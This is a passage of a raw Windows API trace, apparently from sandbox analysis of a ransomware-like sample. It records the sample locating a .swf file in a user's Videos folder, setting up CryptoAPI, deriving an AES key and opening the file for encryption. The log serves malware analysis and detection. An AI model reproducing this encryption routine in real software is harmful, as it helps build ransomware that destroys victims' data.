dwCmpFlags=0x1, lpString1="deos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ioo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.288] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.288] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0198.288] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.288] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.288] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0198.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x7df0cc0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 0x90af58 [0198.289] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0198.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.289] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.289] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0198.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.289] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0198.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0198.289] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.289] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.289] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.290] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0198.290] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.290] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0198.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.291] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0198.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.291] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.291] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.291] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.291] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.291] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.291] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.292] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.292] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.292] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.292] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.292] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.292] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.292] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.292] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.292] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.292] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.292] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.300] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.300] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.300] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.300] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.300] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.301] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.301] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.301] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.301] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.301] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.301] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0198.301] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.301] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0198.301] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.301] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0198.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.302] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.302] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0198.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.302] CryptDestroyHash (hHash=0x90ae18) returned 1 [0198.302] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0198.302] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.302] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\mmrkxsc9iiz.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.303] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.303] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0198.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0198.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0198.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0198.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.304] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.304] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.304] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 